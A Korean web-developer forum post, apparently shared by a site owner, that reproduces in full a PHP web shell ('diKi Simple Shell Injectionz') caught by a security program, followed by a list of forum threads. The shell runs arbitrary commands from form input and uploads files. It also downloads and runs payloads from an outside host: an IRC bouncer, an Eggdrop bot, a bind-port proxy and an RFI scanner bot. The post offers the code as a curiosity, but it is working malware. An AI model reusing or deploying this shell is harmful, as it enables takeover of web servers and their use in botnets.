포럼

해커의 흔적.

2013.07.22 05:52

엘카

?><html><head>

<style type="text/css">

<!--

body,table { font-family:verdana;font-size:11px;color:white;background-color:black; }

table { width:100%; }

table,td { border:1px solid #808080;margin-top:2;margin-bottom:2;padding:5px; }

a { color:lightblue;text-decoration:none; }

a:active { color:#00FF00; }

a:link { color:#5B5BFF; }

a:hover { text-decoration:underline; }

a:visited { color:#99CCFF; }

input,select,option { font:8pt tahoma;color:#FFFFFF;margin:2;border:1px solid #666666; }

textarea { color:#dedbde;font:8pt Courier New;border:1px solid #666666;margin:2; }

input[type="submit"] { border:1px solid #000000; }

input[type="text"] { padding:3px;}

input,select,option,input[type="submit"]:hover { background-color:#333333; }

textarea { background-color:#000000; }

// -->

</style>

<title>-LampungCyber Community-</title>

</head>

<body><center><hr noshade size=1><h2>diKi Simple Shell Injectionz v0.01</h2><p>

<hr noshade size=1>

Thanks to : arch_fajri - lampungcarding - chandra35 - singkong @ irc.bandarlampung.us</center></p>

<hr noshade size=1>


<?php

error_reporting(4);

$sh_mainurl = "http://www.bandarlampung.us/irc/";

$sh_sourcez = array(

  "dQ99Sh"   => array($sh_mainurl."readme.txt","kiddie.php"),

  "dQBNC"   => array($sh_mainurl."dQBNC.tar.gz","dQBNC.tar.gz"),

  "Eggdrop"  => array($sh_mainurl."allnet.tar.gz","allnet.tar.gz"),

  "BindDoor" => array($sh_mainurl."proxy.tgz","proxy.tgz"),

  "RFIScaN" => array($sh_mainurl."404.txt","error.txt"),

);


if (safemode()) { $dsafe = "<font color=#3366FF><b>ON</b></font>"; }

else { $dsafe = "<font color=#3366FF><b>OFF</b></font>"; }


echo "Safe     : $dsafe OS: ".info(php_uname())."<br>".

     "Software : ".info(getenv("SERVER_SOFTWARE"))."<br>".

     "Userid   : ".info(aJ99exec("id"))."<br>".

     "IP Target: ".info(gethostbyname($_SERVER["HTTP_HOST"]))."<br>".

     "IP Anda  : ".info($_SERVER["REMOTE_ADDR"])."<br>";

if (isset($_POST['dir'])) {

  $dir = $_POST['dir'];

  if (!@chdir($dir)) { echo "Ga bisa masuk $dir | "; }

}

else { $dir = getcwd(); }

echo "Direktory: $dir ";

if (is_writable($dir)) { echo "[Writable]"; } else { echo "[Readonly]"; }

?>


<hr noshade size=1>

<center>

<textarea cols=130 rows=20>


<?php


if (empty($_POST['portpsy'])) { $portpsy = 27071; }

if (empty($_POST['bip'])) { $bip = gethostbyname($_SERVER["HTTP_HOST"]); }

if (isset($_POST['bot1'])) {

  $chan1 = $_POST['channel1'];

  $sirc1 = $_POST['serverirc1'];

  echo "Downloading Scanbot 1..\n";

  echo aJ99exec("cd /dev/shm;wget ".$sh_sourcez["RFIScaN"][0]);

  echo "Loading RFI Scanbot.. $chan1 at $sirc1 $port1\n";

  echo aJ99exec("cd /dev/shm;perl ".$sh_sourcez["RFIScaN"][1]." $chan1 $sirc1 $port1;");

}

elseif (isset($_POST['psy'])) {

  $portpsy = $_POST['portpsy'];

  echo aJ99exec("wget ".$sh_sourcez["dQBNC"][0].";tar -zxf ".$sh_sourcez["dQBNC"][1]);

  echo aJ99exec("cd .dQBNC;./config admin $portpsy;./fuck;./run");

}

elseif (isset($_POST['egg'])) {

  $bf = $_POST['bf'];

  $bnick = $_POST['bnick'];

  $bident = $_POST['bident'];

  $bip = $_POST['bip'];

  $bchan = $_POST['bchan'];

  $bowner = $_POST['bowner'];

  echo aJ99exec("wget ".$sh_sourcez["Eggdrop"][0].";tar -zxf ".$sh_sourcez["Eggdrop"][1]);

  echo aJ99exec('cd .allnet;./dhie '.$bf.' '.$bnick.' '.$bident.' '.$bip.' '.$bchan.' '.$bowner);

  echo aJ99exec('cd .allnet;./dssl '.$bf.';cd scripts;./autobotchk '.$bf.' -noemail -5');

elseif (isset($_POST['eggrun'])) {

  $bf = $_POST['bf'];

  $bnick = $_POST['bnick'];

  $bident = $_POST['bident'];

  $bip = $_POST['bip'];

  $bchan = $_POST['bchan'];

  $bowner = $_POST['bowner'];

  echo aJ99exec('cd .allnet;./dhie '.$bf.' '.$bnick.' '.$bident.' '.$bip.' '.$bchan.' '.$bowner);

  echo aJ99exec('cd .allnet;./dssl '.$bf.';cd scripts;./autobotchk '.$bf.' -noemail -5');

}

elseif (isset($_POST['bind'])) {

  echo aJ99exec("wget ".$sh_sourcez["BindDoor"][0].";tar -zxf ".$sh_sourcez["BindDoor"][1].";cd pro;./prox -d -a -p22222");

}

elseif (isset($_POST['cmd'])) {

  $cmdtxt = $_POST['cmdtxt'];

  $ret = aJ99exec($cmdtxt); echo htmlspecialchars($ret);

}


?>

</textarea>

</center>

<hr noshade size=1>

<!-- <form enctype="multipart/form-data" action="" method="POST">

<input type="hidden" name="MAX_FILE_SIZE" value="100000" />

UPLOAD File: <input name="file" type="file" />

<input type="submit" value="UPLOAD" />

</form> -->

<hr noshade size=1>

<form method="POST" enctype="multipart/form-data">

<input type=hidden name="dir" value="<?php echo $dir; ?>">

Direktori: <input type="text" size=40 value="<?php echo $dir; ?>" name="dir" />

Command: <input type="text" size=80 value="<?php echo $cmdtxt; ?>" name="cmdtxt" />

<input type="submit" value="Execute" name="cmd" /><br>

</form>

<!-- <hr noshade size=1>

<form method="POST" enctype="multipart/form-data">

<input type=hidden name="dir" value="<?php echo $dir; ?>">

Port: <input type="text" size=6 value="<?php echo $portpsy; ?>" name="portpsy" />

<input type="submit" value="dQBNC" name="psy" />

<input type="submit" value="Elite Proxy" name="bind" />

</form> -->

<hr noshade size=1>

<hr noshade size=1>

<form method="POST" enctype="multipart/form-data">

<input type=hidden name="dir" value="<?php echo $dir; ?>">

<strong>Install EggDrop : </strong><p>

File: <input type="text" size=10 value="<?php echo $bf; ?>" name="bf" />

Nick: <input type="text" size=10 value="<?php echo $bnick; ?>" name="bnick" />

Ident: <input type="text" size=10 value="<?php echo $bident; ?>" name="bident" />

IP: <input type="text" size=10 value="<?php echo $bip; ?>" name="bip" />

Chan: <input type="text" size=10 value="<?php echo $bchan; ?>" name="bchan" />

Owner: <input type="text" size=10 value="<?php echo $bowner; ?>" name="bowner" />

<input type="submit" value="Install Eggdrop" name="egg" />

<input type="submit" value="Load Eggdrop" name="eggrun" />

</form>

<hr noshade size=1>

<hr noshade size=1>

<!-- <form method="POST" enctype="multipart/form-data">

<input type=hidden name="dir" value="<?php echo $dir; ?>">

Chan: <input type="text" size=6 value="<?php echo $channel1; ?>" name="channel1" />

Server: <input type="text" value="<?php echo $serverirc1; ?>" name="serverirc1" />

Port: <input type="text" value="<?php echo $port1; ?>" name="port1" />

<input type="submit" value="RFIBotScaN" name="bot1" />

</form> -->

<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">

<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>

<?php

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload OK!!!</b><br><br>'; }

else { echo '<b>Upload FAILED!!!</b><br><br>'; }

}

?>

<?php


function info($txt){ return "<font color=lime>".$txt."</font>"; }

###########################

## aJ99Sh CORE FUNCTIONS ##

###########################

function safemode() {

  if ( @ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) { return TRUE; }

  else { return FALSE; }

}

function getdisfunc() {

  $disfunc = @ini_get("disable_functions");

  if (!empty($disfunc)) {

    $disfunc = str_replace(" ","",$disfunc);

    $disfunc = explode(",",$disfunc);

  }

  else { $disfunc= array(); }

  return $disfunc;

}

function enabled($func) {

 if ( is_callable($func) && !in_array($func,getdisfunc()) ) { return TRUE; }

 else { return FALSE; }

}

function aJ99exec($cmd) {

  $output = "";

  if ( enabled("popen") ) {

    $h = popen($cmd.' 2>&1', 'r');

    if ( is_resource($h) ) {

      while ( !feof($h) ) { $output .= fread($h, 2096);  }

      pclose($h);

    }

  }

  elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }

  elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }

  elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }

  elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }


  else { $output = "NULL"; }

  return $output;

}

function aJ99exec2($cmd) {

  $output = "";

  if ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }

  elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }

  elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }

  elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }

  elseif ( enabled("popen") ) {

    $h = popen($cmd.' 2>&1', 'r');

    if ( is_resource($h) ) {

      while ( !feof($h) ) { $output .= fread($h, 2096);  }

      pclose($h);

    }

  }

  return $output;

}


die();

?><?



보안 프로그램에 걸린 해커의 흔적

글쓴이 제목 최종 글
REGOLITH 그룹아이콘+레벨아이콘 동시출력문제 [2] 2013.07.27 by 오락실주인
킴똥똥 당연 아시겠지만 하나 추천해봅니다. [4] file 2013.07.27 by 후아아아~
kukuriko ie 브라우저에서 볼 수 있는 에러문구들~~~  
큰성565 xe recruitment모듈을 개선해주시는 용자님께 희망과 응원의 메세지를 주세요! [2] 2013.07.26 by 큰성565
짤막한글 XE에서 로그인 유지가 포털들처럼 지속되게하는 법은 없나요? [6] 2013.07.25 by 짤막한글
kukuriko 신디케이션 모듈 활용도와 위험성에 대해 [9] 2013.07.25 by 컴토피아
오락실주인 컨텐츠 확장위젯 수정해주실 능력자분 ㅠ [4] file 2013.07.25 by 오락실주인
kukuriko {핫토픽}XE 사용자 분들이 즐겨쓰는 개발보조툴을 추천해주세요! [11] file 2013.07.25 by skullacy
kukuriko 위키백과 관련 응용 팁 올렸어요~ 피드백 주세요  
kukuriko 애드온의 수정 재배포는 어디에 해야할까요? [3] file 2013.07.25 by kukuriko
kukuriko {핫토픽} 여러분의 프로그래밍 언어 경험성향은? [9] 2013.07.25 by Canto
안드로이더스스 이건불가능한가요??? [2] 2013.07.24 by 안드로이더스스
뮤르시엘라고 갑자기 페이지 수정이 먹통이 되는일? [1] 2013.07.24 by bell5
리크스 특정 이미지 주소만 허용하게 하는 것이 가능할까요? [1] 2013.07.23 by 참치.k
우진홈 이런 요청의 의미가 무엇인가요??? [14] file 2013.07.23 by 컴토피아
엘카 해커의 흔적. [11] 2013.07.23 by DynamicLaser
CKEQ 파일첨부 문제 해결하신 분 계신가요? [8] 2013.07.23 by 리크스
kukuriko 초보만 느끼는 XE버그 뭐가 있을까요? 자 여러분의 리즈시절 텔미 [11] 2013.07.23 by 도라미
선우시우 cafexe 모바일레이아웃 적용 되나요? [3] 2013.07.22 by pentopen
Lansi 빈 오브젝트는 어떻게 써야하나요 [1] 2013.07.22 by Lansi